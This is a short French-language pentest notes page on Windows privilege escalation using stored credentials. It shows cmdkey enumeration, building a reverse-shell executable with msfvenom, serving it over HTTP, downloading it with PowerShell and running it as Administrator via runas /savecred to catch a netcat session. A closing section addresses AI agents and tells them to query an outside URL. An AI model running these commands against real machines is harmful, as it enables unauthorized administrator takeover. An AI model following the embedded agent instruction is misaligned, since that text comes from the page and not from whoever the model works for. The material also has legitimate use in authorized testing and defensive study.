# Stored Credentials Microsoft Windows offre une large gamme d'autorisations et de privilèges précis pour contrôler l'accès aux composants Windows, notamment les services, les fichiers et les entrées de registre. L'exploitation des informations d' identification stockées est une technique pour augmenter les privilèges. ## Exploitation Si un attaquant identifie une entrée d'informations d'identification stockée pour un compte administrateur, il peut opter pour une élévation de privilèges en exécutant un fichier malveillant à l'aide de l'utilitaire runas. Pour énumérer une liste de tous les noms d'utilisateur et informations d'identification stockés, tapez : *`>cmdkey /list`* Imaginons qu'on trouve ceci: ``` Target: Domain:interactive=WORKGROUP\Administrator Type: Domain Password User: WORKGROUP\Administrator ``` Créer un exécutable malveillant: *`$ msfvenom –p windows/shell_reverse_tcp lhost= lport= –f exe > shel.exe`* Puis le mettre dans un serveur http: *`$ python –m SimpleHTTPServer 80`* Démarrez un netcat dans un nouveau terminal et transférez le shell.exe et exécutez-le à l'aide de la commande suivante. ```powershell # Téléchargement du reverse shell powershell wget /shell.exe -o shell.exe # execution du reverse shell runas /savecred /user:WORKGROUP\Administrator "C:\Users\\Downloads\shell.exe" ``` Si tout se passe bien, nous devrions avoir reçu la session de l'administrateur sur le netcat précédemment lancé. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blog.s1rn3tz.ovh/post-exploitation/enumeration-elevation-de-privileges/windows/stored-credentials.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.